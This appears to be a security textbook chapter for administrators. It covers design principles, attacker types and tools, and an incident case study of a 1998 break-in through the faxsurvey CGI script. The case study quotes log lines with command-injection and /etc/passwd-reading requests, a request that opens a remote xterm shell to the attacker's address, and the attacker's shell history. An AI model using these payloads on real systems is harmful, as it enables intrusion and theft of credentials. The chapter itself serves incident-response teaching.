Chapter 2. Security For Administrators

At a Glance

This chapter provides an operational definition of security for administrators, discusses the design of secure systems, and explains who attacks computer systems. Some typical attacker tools are enumerated, and a case study of an attack is developed.

Security for Administrators

As a technical administrator, you’re responsible for insuring that the systems you manage do what they’re supposed to do. Although there are many formal definitions of security, a useful operational definition for administrators is:

A computer is secure if you can depend on it and its software to behave as you expect.

If you expect the data entered into your machine today to be there in a few weeks, and to remain unread by anyone who is not supposed to read it, then the machine is secure. Security, then, is a critical function of every administrator’s role. By this definition, natural disasters and buggy software are as much threats to security as unauthorized users are.

Bad Code

Designing secure computing systems and software isn’t easy. In 1975, Jerome Saltzer and M. D. Schroeder described seven criteria for building such systems. They are:

Least privilege

Every user and process should have the least set of access rights necessary. Least privilege limits the damage that can be done by malicious attackers and errors alike. Access rights should be explicitly required, rather than given to users by default.

Economy of mechanism

The design of the system should be small and simple so that it can be verified and correctly implemented.

Complete mediation

Every access should be checked for proper authorization.

Open design

Security should not depend upon the ignorance of the attacker. This criterion precludes back doors in the systems that give access to users who know about them.

Separation of privilege

Where possible, access to system resources should depend on more than one condition being satisfied.

Least common mechanism

Users should be isolated from one another by the system. This limits both covert monitoring and cooperative efforts to override system security mechanisms.

Psychological acceptability

The security controls must be easy to use so that they will be used and not bypassed.

Unfortunately, designers often never learn these criteria, forget them, take shortcuts, or decide they’re not important enough to bother with. As a result, there are many poorly-designed but widely-used operating systems, algorithms, and applications, including software that purports to be part of the security infrastructure of a system. Bad design leads to bugs and unforeseen side effects, which may cause accidental damage to your systems or information, or may be exploited intentionally by an attacker.

Free vs. Proprietary Software

One of the more controversial debates in software design is whether development processes that make source code freely available to users to inspect, modify, and redistribute (“free software” or “open source” software) should be preferred to proprietary (“closed source”) development on the basis of security.

On the one hand, freely available source code makes it easier for attackers to find exploitable bugs in a program by reading its source code. Because there are many common classes of program errors that lead to vulnerabilities, source code can sometimes even be submitted to automated analysis to turn up bugs. Bugs have certainly been found and exploited in open source software.

On the other hand, closed source is not a panacea. In many cases, programs can be reverse-engineered, or vulnerabilities can be spotted through “black box” testing of a program without the source code. Clearly, lack of availability of the source code for Microsoft’s Internet Information Server, for example, has not prevented attackers from exploiting several vulnerabilities, and this product seems to have a higher rate of exploits reported than, for example, the Apache web server.

Open source development can makes it easier for program developers and users to spot and fix bugs before attackers find them. The OpenBSD operating system, which is free software, is widely acknowledged as one of the most secure operating systems currently available, in large part because it has had a security audit of every line of kernel source code by its developers. Other open source operating system kernels, including Linux, are not as heavily vetted and contain code from many developers. It is difficult to know the degree to which proprietary Unix operating systems such as Solaris have been audited for security.

Understanding Your Adversaries

Who is breaking into networked computers with the most sophisticated of attacks? It almost doesn’t matter—no matter who the attackers may be, they all need to be guarded against.

Script kiddies

As clichÈd as it may sound, in many cases the attackers are children and teenagers— people who sadly have not (yet) developed the morals or sense of responsibility that is sufficient to keep their technical skills in check.

It is common to refer to young people who use sophisticated attack tools as script kiddies. The term is derisive. The word “script” implies that the attackers use readily available attack scripts that can be downloaded from the Internet to do their bidding, rather than creating their own attacks. And, of course, the attackers are called “kiddies” because so many of them turn out to be underage when they are apprehended.

Script kiddies should be considered a serious threat and feared for the same reason that teenagers with guns should be feared. In many cases, teenagers with handguns should be feared even more than adults, because a teenager is less likely to understand the consequences of his actions should he pull the trigger and thus more likely to pull it.

The same is true of script kiddies. In May 2001, for instance, the web site of Gibson Research Corporation was the subject of a devastating distributed denial-of-service attack that shut down its web site for more than 17 hours. The attack was orchestrated by more than 400 Windows computers around the Internet that had been compromised by an automated attack. As it turns out, Steve Gibson was able to get a copy of the attack program, reverseengineer it, and trace it back. It turned out that his attacker was a 13-year-old girl.

Likewise, when authorities in Canada arrested “Mafiaboy” on April 19, 2000, for the February 2000 attacks on Yahoo, E*TRADE, CNN, and many other high-profile sites—attacks that caused more than $1.7 billion in damages— they couldn’t release the suspect’s name to the public because the 16-year-old was shielded by Canada’s laws protecting the privacy of minors.208

208 http://news.cnet.com/news/0-1005-200-4523277.html

Script kiddies may not have the technical skills necessary to write their own attack scripts and Trojan horses, but it hardly matters. They have the tools and increasingly they show few reservations about using them. Either they do not understand the grave damage they cause, or they do not care.

What does a script kiddie do when he grows up? Nobody is really sure—to date, there are no reliable studies. Anecdotal reports suggest that many script kiddies go straight. Some lose interest in computers; some become system operators and network administrators; and some even go into the field of computer security. (The wisdom of hiring one of these individuals to watch over your network is a matter of debate within the computer security community.) But it is unquestionably clear that some individuals continue their lives of crime.

Industrial spies

There appears to be a growing black market for information stolen from computer systems. Some individuals have tried to ransom or extort the information from its rightful owners—for example, by offering to help a company close its vulnerabilities in exchange for a large cash payment. There have been several documented cases (and perhaps many more unreported) in which criminals have stolen credit card numbers of clients from a company’s server and threatened to post the information unless the company paid them. There have also been reports of attackers who have tried to sell industrial secrets to competitors of the companies that they have penetrated. Such transactions are illegal in the United States and in many other countries, but not in all.

Ideologues and national agents

There is a small but growing population of “hacktivists” who break into sites for ideological or political reasons. Often, the intent of these people is to deface web pages to make a statement of some kind, by defacement of law enforcement agencies, destruction of web sites by environmental groups, or destruction of research computing sites involving animal studies, to give some examples. Sometimes, the protesters are making a political statement; they may be advancing an ideological cause, or they may merely be anarchists striking a blow against technology or business.

Sometimes, these incidents may be carried out against national interests. For instance, a guerilla movement may deface sites belonging to a government opponent. In other cases, you see individuals in one jurisdiction attempting to make some point by attacking sites in another, such as in the Israeli-Palestinian conflict, the ongoing tension between Pakistan and India, and the aftermath of the accidental bombing of the Chinese embassy by U.S. forces. Many of these attacks may be spontaneous, but some may be coordinated or financed by the governments themselves.

These incidents can also affect third parties. For instance, during a Chinese crackdown, many ISPs around the world hosting web pages of adherents of Falun Gong found their servers under attack from sites inside China. Because of the coordination and replication of the attacks, authorities believed they were actually state-sponsored. ISPs have been attacked by vigilantes because they sell service to spammers, provide web service for hate groups, or seem to be associated with child pornographers—even if the ISP owners and operators were unaware of these activities!

Organized crime

Vast amounts of valuable information and financial data flow through the Internet. It would be naive to believe that the criminal element is unaware of this, or is uninterested in expanding into the networked world. There have been incidents of fraud, information piracy, and money laundering conducted online that officials believe are all related to organized crime. Communications on the Net have been used to advance and coordinate prostitution and pornography, gambling, trafficking in illegal substances, gun running, and other activities commonly involving organized crime. Furthermore, law enforcement sites may be targeted by criminals to discover what is known about them, or to discover identities of informants and witnesses.

With network globalization, the threats have a longer reach. The Russian mob, Sicilian Mafia, Japanese Yakuza, South American drug families, and Los Angeles gangs (to name a few) are all a few mouse clicks away on the network. Many law enforcement officials worry as a result that the Internet is a “growth” area for crime in the coming decade.

Rogue employees and insurance fraud

Finally, there are many cases of tactically skilled employees who have turned against their employers out of revenge, malice, or boredom. In some cases, terminated employees have planted Trojan horses or logic bombs in their employer’s computers. In other cases, computer systems have been destroyed by employees as part of insurance scams.

What the Attacker Wants

Compromising a computer system is usually not an end in itself. Instead, most attackers seek to use compromised systems as a stepping-stone for further attacks and vandalism. After an attacker compromises a system, the system can be used for many nefarious purposes, including:

• Launching probes or exploits against other systems

• Participating in distributed denial-of-service (DDOS) attacks

• Running covert servers (e.g., the attacker might set up an Internet Relay Chat server that will act as a rendezvous point for Trojan horses and viruses that are sending back captured data)

• Covertly monitoring the network of the organization that owns the compromised system, with the goal of compromising more systems

• Becoming a repository for attack tools, pirated software, pornography, or other kinds of contraband information

There are many reasons that compromised systems make excellent platforms for these kinds of illegal activities. If a compromised system is connected to a high-speed Internet connection, the system may be able to do much more damage and mayhem than other systems that the attacker controls. Compromised systems can also be used to make it more difficult for authorities to trace an attacker’s actions back to the person behind the keyboard. If an attacker hops through many computers in different jurisdictions—for example, from a compromised Unix account in France to a Windows proxy server in South Korea to an academic computer center in Mexico to a backbone router in New York—it may be effectively impossible to trace the attacker backward to the source.

Tools of the Attacker’s Trade

A smattering of tools that have been commonly used by attackers would include:

nc (a.k.a. netcat)

Originally written by “Hobbit,” netcat is the Swiss Army knife for IP-based networks. As such, it is a valuable diagnostic and administrative tool as well as useful to attackers. You can use netcat to send arbitrary data to arbitrary TCP/IP ports on remote computers, to set up local TCP/IP servers, and to perform rudimentary port scans.

trinoo (a.k.a. trin00)

trinoo is the attack server. trinoo waits for a message from a remote system and, upon receiving the message, launches a denial-of-service attack against a third party. Versions of trinoo are available for most Unix operating systems, including Solaris and Red Hat Linux. The presence of trinoo is usually hidden. A detailed analysis of trinoo can be found at http://staff.washington.edu/dittrich/misc/trinoo.analysis.

Back Orifice and Netbus

These Windows-based programs are Trojan horses that allow an attacker to remotely monitor keystrokes, access files, upload and download programs, and run programs on compromised systems.

bots

Short for robots, bots are small programs that are typically planted by an attacker on a collection of computers scattered around the Internet. Bots are one of the primary tools for conducting distributed denial-of-service attacks and for maintaining control on Internet Relay Chat channels. Bots can be distributed by viruses or Trojan horses. They can remain dormant for days, weeks, or years until they are activated. Bots can even engage in autonomous actions.

root kits

A root kit is a program or collection of programs that simultaneously gives the attacker superuser privileges on a computer, plants back doors on the computer, and erases any trace that the attacker has been present. Originally, root kits were designed for Unix systems (hence the name “root”), but root kits have been developed for Windows systems as well. A typical root kit might attempt a dozen or so different exploits to obtain superuser privileges. Once superuser privileges are achieved, the root kit might patch the login program to add a back door, then modify the computer’s kernel so that any attempt to read the login program returns the original, unmodified program, rather than the modified one. Commands might be modified so that network connections from the attacker’s machine are not displayed. Finally, the root kit might then erase the last five minutes of the computer’s log files.

Worms

Worms exploiting vulnerabilities in network servers or networking components of operating systems have become a common way to compromise large numbers of computers at once.

Case Study: Faxsurvey

On October 7, 1998, an employee at Vineyard.NET noticed that the user http was logged in to the company’s primary web server:

Script started on Wed Oct 7 20:54:21 1998

bash-2.02# W

8:57PM up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35

USER TTY FROM LOGIN@ IDLE WHAT

http p0 KRLDB110-06.spli Tue02AM 1days /bin/sh

simsong p1 asy12.vineyard.n 8:42PM 15 -tcsh (tcsh)

ericx p2 mac-ewb.vineyard 8:46PM 0 script

ericx p3 mac-ewb.vineyard 8:46PM 11 top

ericx p4 mac-ewb.vineyard 8:53PM 1 sleep 5

bash-2.02#

This computer was running the BSDI v3.1 operating system with all patches as released by the vendor. The web server was a version of the Apache web server named Strong-hold. The computer was used to initiate Automated Clearing House electronic funds transfers from customer accounts. To assist in these funds transfers, the computer held credit card and bank account information. (Fortunately, that information on the computer was stored in an encrypted format.)

In all likelihood, a user logged in as http could be the result of two things. First, it could be a member of the ISP’s staff who was using the http account for debugging. Alternatively, it could be an attacker who had found some way to break into the http account, but had been unable to gain additional access. Because the user http was logged in from a computer whose name began KRLDB110-06.spli, it appeared to the staff that this was a case of unauthorized access.

When the intrusion was discovered, one of the staff members immediately started the Unix program script to record his actions. The intruder appeared to be idle for more than a day. The original intrusion had taken place on Tuesday at 2:00 a.m.

The next step was to list all of the processes currently running on the computer. Two processes were out of place — they were two copies of the /bin/sh shell that were being run by http. Both of those shells had been started on the previous day, one at 2:00 a.m., the other at 4:00 a.m:

bash-2.02# ps auxww

Apparently, the intruder had broken in and then, for some reason, had given up. As there appeared to be no immediate urgency, the ISP carefully formulated a plan of action:

1. Do not alert the intruder about what is happening.

2. Determine the intruder’s source IP address.

3. Use the Unix kill command to STOP the intruder’s processes. This signal would prevent the processes from running while leaving a copy in memory.

4. Make a copy of the intruder’s processes using the Unix gcore command.

5. Place a rule on the ISP router to block packets from the intruder’s ISP.

6. Kill the intruder’s processes unequivocally with kill -9

7. Determine how the intruder had broken in and fix the hole.

8. Alert law enforcement.

To trace the intruder, the ISP tried using the netstat command. This turned up a new piece of information. The intruder had not broken in with Telnet or SSH; instead, there was an X11 connection from the web server (Apache.Vineyard.NET) to an X server running on the intruder’s computer:

bash-2.02# netstat -a

Active Internet connections (including servers)

The ISP concluded that the attacker had used a vulnerability in a CGI script to spawn an xterm back to his remote machine. To test this hypothesis, the ISP did a quick search through its web server logs:

% grep -I krldb110-06 /vni/apache/log/access_log

1. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] “GET /cgi-bin/ phf?Qname=me%0als%20-lFa HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”

2. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] “GET /cgi-bin/ faxsurvey?ls%20-lFa HTTP/1.0”

200 5469 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”

3. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] “GET /cgi-bin/ viewsource?../../../../../../../../etc/passwd HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”

4. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:53 -0400] “GET /cgi-bin/ htmlscript?../../../../../../../../etc/passwd HTTP/1.0” 404 - “-” “Mozilla/ 4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”

5. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:54 -0400] “GET /cgi-bin/ campas?%0als%20-lFa HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)” “/htdocs/biz/captiva”

6. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:55 -0400] “GET /cgi-bin/ handler/useless_shit;ls%20-

lFa|?data=Download HTTP/1.0” 404 - “-” “Mozilla/ 4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”

7. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:56 -0400] “GET /cgi-bin/ php.cgi?/etc/passwd HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)” “/htdocs/biz/captiva”

8. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] “GET /cgi-bin/ faxsurvey?ls%20-lFa HTTP/1.1”

200 5516 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”

9. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] “GET /cgi-bin/ faxsurvey?uname%20-a HTTP/1.1” 200 461 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”

10. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:03 -0400] “GET /cgi-bin/ faxsurvey?id HTTP/1.1” 200

381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”

11. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] “GET /cgi-bin/ faxsurvey?cat%20/etc/passwd HTTP/1.1” 200 79467 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”

12. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] “GET /cgi-bin/ faxsurvey?ls%20-lFa%20/usr/ HTTP/1.1” 200 1701 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”

13. krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] “GET /cgi-bin/ faxsurvey?id HTTP/1.1” 200

381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”

14. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] “GET /cgi-bin/ faxsurvey?pwd HTTP/1.1” 200

305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”

15. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] “GET /cgi-bin/ faxsurvey?/bin/pwd HTTP/1.1”

200 305 “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)” “/htdocs/web.vineyard.net”

16. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] “GET /cgi-bin/ faxsurvey?ls%20-lFa HTTP/1.1”

200 5516 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”

17. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] “GET /cgi-bin/ faxsurvey?ls%20-

lFa%20../conf/ HTTP/1.1” 200 305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”

Notice that lines 1–7 each occur within a few seconds of each other. It appears that the attacker is using an automated tool that checks for CGI vulnerabilities. In 8–17 the attacker exploits a vulnerability in the faxsurvey script. This was almost certainly done with a different tool; one indication is that the version of the HTTP protocol that the client supports changes from “HTTP/1.0” to “HTTP/1.1”.

The web server log file revealed that the full hostname of the attacker was krldb110-06. splitrock.net. Using the host command, this address could be translated into an actual IP address:

apache: {43} % host krldb110-06.splitrock.net krldb110-06.splitrock.net has address 209.156.113.121 apache: {44} %

By inspecting the log file, it appears that the script /cgi-bin/faxsurvey has a bug that allows the attacker to execute arbitrary commands. (Otherwise, why else would the attacker keep sending URLs calling the same script with different arguments?) If this is true, then the following commands must have been executed by the attacker:

ls -lFa

ls -lFa

uname -a

id

cat /etc/passwd

ls -lFa /usr/

id

pwd

/bin/pwd

ls -lFa

ls -lFa ../conf/

It is not clear from the log files how the attacker was able to go from executing these commands to executing the xterm command. But is very clear that the xterm command was executed, as evidenced by the http entry in the output of the w command, the running (xterm) process, and the X11 entry in the netstat command.

At this point, the ISP searched for the attacker’s hostname in other log files. A suspicious result was found in the messages log file — apparently the attacker had attempted to exploit a POP or qpopper bug:

apache: {15} % grep -i krldb110-06 *

messages:Oct 6 03:38:29 apache popper.bsdos[22312]: @KRLDB110-06. splitrock.net: -ERR POP timeout

To preserve the record of the attacker’s processes, they were stopped, an image of the process memory was saved, and then the processes were killed.

Following this, a rule was added to the ISP’s routers to block access from the attacker’s IP addresses. Permissions on the faxsurvey script were changed to prevent any access, pending an investigation. A few days later, the script was removed from the web server.

The attacked ISP contacted SplitRock Services, Inc., the ISP that was responsible for the IP address. It was determined that SplitRock operated several modem pools that were provided to another ISP (Prodigy) on a leasing arrangement. SplitRock was asked to preserve its logfiles so that they could be used in a future legal investigation.

By using the Unix strings command over the process memory image files, it was possible to extract significantly more information about the attacker. One group of strings was from the shell history that was, effectively, a list of the commands that the attacker had typed. The attacker appeared to have downloaded a rootkit, and also to have attempted to get a buffer overflow attack to work properly against the system’s IMAP server:

-lFa gcc -o s s.c

st2.c ftp 209.156.113.121

cron.c gcc -o s st2.c

cxterm.c ./s console

x2.c t .s

qpush.c .121

cat t.c qpush.c

cat .c ppp.c

cat s.c t2.c

gc c cron.c

ls –lFa cxterm.c

./s -v c2 tcsh

./s p0 x2.c

ls -lFa / README

cat .s README.debian

ls –lFa qpush

cat /w qpush.c

ls -lFa / qpush.c.old

cat .s Gf: not found

_=.s /tmp

$ : not found mfs:28

gcc -o s steal.c /bin/sh

ls -lFa *.c

/bin/sh

/bin/sh

/etc/inetd.conf

qpush.c

/usr/bin/gcc

n/gcc

./cc

Expr

Done

/bin/sh

inetd.conf

t) | telnet 127.1 143

cd /etc

cat .s

which pwd

ls –lFa

expr $L + 1

ls –lFa

./cc –10

./cc

The second kind of strings found in the memory images corresponded to shell environment variables. Many of these were variables that would be set for a process spawned from a CGI script — confirming that the shell was, in fact, the result of a CGI attack. This block confirmed that the CGI script responsible for the intrusion was the faxsurvey script.

GATEWAY_INTERFACE=CGI/1.1

REMOTE_HOST=krldb110-06.splitrock.net

MACHTYPE=i386-pc-bsdi3.1

HOSTNAME=apache.vineyard.net

L=100

SHLVL=1

REMOTE_ADDR=209.156.113.121

QUERY_STRING=/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20- rv%20-e%20/bin/sh DOCUMENT_ROOT=/htdocs/biz/captiva

REMOTE_PORT=4801

HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)

HTTP_ACCEPT=application/vnd.ms-excel, application/msword, application/vnd. ms-powerpoint, */*

SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey

HTTP_HOST=www.captivacruises.com

LOGNAME=http

WINDOWID=8388621

_=/bins

REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156. 113.121:0.0%20-rv%20- e%20/bin/sh

SERVER_SOFTWARE=Stronghold/2.2 Apache/1.2.5 C2NetUS/2002

TERM=xterm

HTTP_CONNECTION=Keep-Alive

PATH=/usr/local/bin:/bin:/usr/bin:/usr/sbin

HTTP_ACCEPT_LANGUAGE=en-us

DISPLAY=209.156.113.121:0.0

SERVER_PROTOCOL=HTTP/1.1

HTTP_ACCEPT_ENCODING=gzip, deflate

SHELL=/bin/tcsh

REQUEST_METHOD=GET

OSTYPE=bsdi3.1

<a href="mailto:SERVER_ADMIN=mvol@vineyard.net">SERVER_ADMIN=mvol@vineyard.net</a>

SERVER_ROOT=/usr/local/apache

TERMCAP=xterm|vi|xterm-ic|xterm-vi|xterm with insert character instead of insert mode:

:al@:dl@:im=:ei=:mi@:ic=\E[@: :AL=\E[%dL:DC=\E[%dP:DL=\E[

%dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA: :al=\E[L:am: :bs:cd=\E[J:ce=\

E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80: :cs=\E[%i%d;%dr:ct=\E[3k: :dc

SERVER_PORT=80

SCRIPT_NAME=/cgi-bin/faxsurvey

HOSTTYPE=i386

After the intrusion, the victim ISP contacted the Boston office of the Federal Bureau of Investigation. The ISP was informed that the Boston office had a damage threshold of $8,000 that needed to be exceeded before an investigation could be opened. As this threshold had not been met, no investigation would take place. While such minimums are understandable, they are unfortunate for two reasons:

• Many attacks are conducted by relatively young offenders, who might cease such activity if they received a warning or, at most, a suspended sentence. The lack of any official investigation and follow-up only encourages these attackers to engage in larger and larger crimes until they are responsible for serious damage.

• In this case, the attacker appeared to be quite sophisticated. It’s quite possible that the attacker was engaged in other illegal activities that usually go by without anyone noticing. There are many cases in which the investigation of relatively small crimes have led law enforcement agencies to significant criminal enterprises. For example, it was a 75-cent accounting discrepancy that caused Cliff Stoll to track down a computer hacker who was ultimately found to be breaking into US commercial and military computers at the behest of the Soviet Union (a story detailed in Stoll’s classic hacker thriller, The Cuckoo’s Egg).

As it turns out, the vulnerability in the faxsurvey script had been reported over the BugTraq mailing list nearly three months prior to the attack. Either nobody from the ISP had been reading the BugTraq mailing list, or else no one was aware that the faxsurvey script had been installed:

Date: Tue, 4 Aug 1998 07:41:24 -0700

Reply-To: <a href="mailto:dod@muenster.net">dod@muenster.net</a>

From: Tom &lt;dod@MUENSTER.NET&gt;

Subject: remote exploit in faxsurvey cgi-script

Hi!

There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command s/he wants with the permissions of the HTTP-Server.

All the attacker has to do is type http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd in his favorite Web-Browser to get a copy of your Password-File.

All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package installed are vulnerable to this attack.

AFAIK the problem exists in the call of 'eval'.

I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild &lt;bs@suse.de&gt; told me, that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just remove the script from the file list.

After the break-in, the ISP performed the following cleanup:

• An immediate backup of all disks was done. This backup was preserved as evidence in the event that damage was discovered that needed to be addressed.

• The system was scanned for new privileged files. None were found.

• Permissions on the /usr/include directory and the C compiler were changed so that only staff members could access these files and compile new programs.

• Key programs were compared with the distribution CD-ROM to determine if any had been modified. They had not been.

• All log files were manually examined for additional suspicious activity. None was found.

• After a week, the router rule blocking access to SplitRock was removed.